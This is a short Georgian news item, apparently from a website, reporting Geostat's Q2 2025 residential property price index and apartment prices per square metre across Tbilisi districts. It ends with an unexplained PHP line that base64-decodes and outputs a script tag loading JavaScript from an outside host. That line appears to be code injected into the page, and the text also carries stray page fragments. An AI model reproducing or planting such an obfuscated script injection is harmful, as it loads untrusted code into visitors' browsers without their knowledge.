global distribution
გარე ავეჯი

„საქსტატის“ მიხედვით, 2025 წლის მეორე კვარტალში, წინა კვარტალთან შედარებით საცხოვრებელი უძრავი ქონების ფასების ინდექსი (RPPI) 1%-ით შემცირდა, ხოლო ინდექსის წლიურმა ზრდამ 5.4% შეადგინა.

2020 წლის საშუალოსთან შედარებით, ინდექსი 56.1%-ით არის გაზრდილი. წლევანდელ მეორე კვარტალში, წინა კვარტალთან შედარებით, ფასების კლება დაფიქსირდა როგორც საცხოვრებელი ბინების სეგმენტში (-0.6%), ისე კერძო სახლების სეგმენტში (-2.5%). რაც შეეხება წლიურ ცვლილებას, 2024 წლის მე-2 კვარტალთან შედარებით, ფასების ზრდა დაფიქსირდა ორივე სეგმენტში - ბინებზე 5.2%, ხოლო კერძო სახლებზე 5.7%-ით.

2025 წლის მე-2 კვარტალის მონაცემებით, გთავაზობთ საცხოვრებელი ბინების ფასებს, კვადრატულ მეტრზე, უბნების მიხედვით:

მთაწმინდა - 6 624 ლარი;
ვაკე - 5 856 ლარი;
ჩუღურეთი - 4 358 ლარი;
საბურთალო - 4 267 ლარი;
დიდუბე - 4 069 ლარი;
კრწანისი - 3 922 ლარი;
ნაძალადევი - 3 819;
ისანი - 3 813 ლარი;
გლდანი - 3 669 ლარი;
სამგორი - 3 468 ლარი.

28
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");